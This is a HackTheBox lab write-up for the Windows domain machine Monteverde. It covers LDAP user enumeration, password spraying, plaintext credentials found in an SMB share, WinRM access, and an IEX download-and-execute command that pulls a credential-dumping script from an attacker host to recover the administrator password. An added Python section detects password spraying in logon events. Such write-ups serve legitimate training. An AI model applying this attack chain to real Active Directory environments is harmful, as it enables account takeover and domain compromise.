HackTheBox - Monteverde
Monteverde is a Windows Active Directory HackTheBox machine. Solving it involved retrieving a list of users over LDAP, password spraying to discover a service account whose password was equal to its username, discovering plaintext credentials in a configuration file, and finally taking advantage of Azure Admins group membership to retrieve the administrator credentials.
Reconnaissance
Port Scan
Let’s start off with a port scan for all TCP ports with service/version detection.
$ nmap -Pn -p- -sV --max-retries 0 -oA nmap/full 10.10.10.172
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-22 09:24:58Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
[...]
LDAP Enumeration
Query the default naming context
$ ldapsearch -LLL -x -h 10.10.10.172 -s base -b '' defaultNamingContext
dn:
defaultNamingContext: DC=MEGABANK,DC=LOCAL
Retrieve a list of usernames
$ ldapsearch -LLL -x -h 10.10.10.172 -b 'dc=megabank,dc=local' '(objectClass=user)' sAMAccountName \
| grep sAMA | cut -d ' ' -f2 | tail -n+4 | tee users.txt
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
Password Spraying
Let's check whether any account uses its own username as its password.
$ crackmapexec smb 10.10.10.172 -u users.txt -p users.txt
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:mhope STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:SABatchJobs STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:svc-ata STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:svc-bexec STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:svc-netapp STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:dgalanos STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:roleary STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\mhope:smorgan STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [-] MEGABANK\SABatchJobs:mhope STATUS_LOGON_FAILURE
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJob
Valid credentials found:
- User: SABatchJobs
- Password: SABatchJobs
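Seen from the defender's side, the run above is exactly the pattern a detection rule on the domain controller looks for: a burst of NTLM logon failures from one source, then a success. The following Python is an added example, not part of the original write-up; it classifies constructed, simplified 4625/4624 Security event lines (the key=value line format and the source IPs are invented) per source IP as spraying or single-account brute force, and lists the accounts that subsequently logged on from that source.

```python
from collections import defaultdict
from datetime import datetime

# 4625 SubStatus codes worth counting: right account/wrong password, and unknown account
WRONG_PASSWORD, NO_SUCH_USER = "0xC000006A", "0xC0000064"

def parse_event(line):
    """'<iso-time> <event-id> key=value ...' (constructed format) -> dict."""
    ts, event_id, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["time"] = datetime.fromisoformat(ts.replace("Z", "+00:00"))
    rec["id"] = int(event_id)
    return rec

def classify_sources(lines, min_accounts=5, max_attempts=3):
    """Per source IP: 'spray' if failures hit >= min_accounts distinct accounts,
    'brute_force' if one account gets > max_attempts failures (the user x password
    run on this box looks like that), else None. Accounts with a 4624 after the
    first failure are listed as 'succeeded'. The input is one detection window."""
    by_src = defaultdict(list)
    for rec in sorted(map(parse_event, lines), key=lambda r: r["time"]):
        by_src[rec["IpAddress"]].append(rec)
    findings = {}
    for src, events in by_src.items():
        failed = [e for e in events if e["id"] == 4625
                  and e.get("SubStatus") in (WRONG_PASSWORD, NO_SUCH_USER)]
        if not failed:
            continue
        attempts = defaultdict(int)
        for e in failed:
            attempts[e["TargetUserName"].lower()] += 1
        kind = ("spray" if len(attempts) >= min_accounts
                else "brute_force" if max(attempts.values()) > max_attempts else None)
        succeeded = sorted({e["TargetUserName"].lower() for e in events
                            if e["id"] == 4624 and e["time"] > failed[0]["time"]})
        findings[src] = {"kind": kind, "accounts": sorted(attempts), "succeeded": succeeded}
    return findings

# Constructed sample log: 10.10.14.5 mirrors the run above (eight wrong passwords
# for mhope, then SABatchJobs fails once and logs on); 10.10.14.9 sprays one
# password across six accounts with no success.
USERS = ["mhope", "svc-ata", "svc-bexec", "svc-netapp", "dgalanos", "roleary"]
SAMPLE = (
    [f"2020-04-22T09:25:0{i}Z 4625 TargetUserName=mhope IpAddress=10.10.14.5 SubStatus={WRONG_PASSWORD}"
     for i in range(8)]
    + [f"2020-04-22T09:25:08Z 4625 TargetUserName=SABatchJobs IpAddress=10.10.14.5 SubStatus={WRONG_PASSWORD}",
       "2020-04-22T09:25:09Z 4624 TargetUserName=SABatchJobs IpAddress=10.10.14.5 LogonType=3"]
    + [f"2020-04-22T09:30:0{i}Z 4625 TargetUserName={u} IpAddress=10.10.14.9 SubStatus={WRONG_PASSWORD}"
       for i, u in enumerate(USERS)]
)
```

Running `classify_sources(SAMPLE)` flags 10.10.14.5 as brute_force with sabatchjobs in succeeded, and 10.10.14.9 as spray; a real deployment would feed it the DC's Security log and apply a time window per source.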
Foothold
Listing SMB shares as SABatchJobs
$ ./smbmap.py -H 10.10.10.172 -u 'SABatchJobs' -p 'SABatchJobs'
[+] IP: 10.10.10.172:445 Name: 10.10.10.172
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
The azure_uploads and users$ shares are interesting. We can mount them locally and start exploring them. The first is empty, but the users$ one contains a few folders.
$ sudo mount -t cifs //10.10.10.172/users$ shares/ -o "username=SABatchJobs,password=SABatchJobs"
$ cd shares && ls -lh
total 0
drwxr-xr-x 2 root root 0 Jan 3 08:12 dgalanos
drwxr-xr-x 2 root root 0 Jan 3 08:41 mhope
drwxr-xr-x 2 root root 0 Jan 3 08:10 roleary
drwxr-xr-x 2 root root 0 Jan 3 08:10 smorgan
All the directories are empty except the mhope one, which contains an XML file.
$ ls -lh mhope
total 4.0K
-r-xr-xr-x 1 root root 1.2K Jan 3 08:40 azure.xml
The XML file contains a plaintext password. The password found inside azure.xml is the password of user mhope. With those credentials we can log in to the box with WinRM.
$ evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
*Evil-WinRM* PS C:\Users\mhope\Documents>
User flag:
*Evil-WinRM* PS C:\Users\mhope\Desktop> type user.txt
4961976bd7d8f[...]
Privilege Escalation to Domain Admin
ADSync
User mhope is a member of the Azure Admins group.
*Evil-WinRM* PS C:\Users\mhope\Music> whoami /groups | findstr Admin
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-...
Being in the Azure Admins group, we can use the Azure-ADConnect.ps1 script to retrieve the administrator credentials from the ADSync database.
*Evil-WinRM* PS C:\Users\mhope\Music> IEX(New-Object Net.WebClient).DownloadString('http://10.10.15.121:8000/Azure-ADConnect.ps1')
*Evil-WinRM* PS C:\Users\mhope\Music> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+] Password: d0m@in4dminyeah!
Login as Administrator via WinRM
$ evil-winrm -i 10.10.10.172 -u 'administrator' -p 'd0m@in4dminyeah!'
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Root flag
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
12909612d25c8dcf6[...]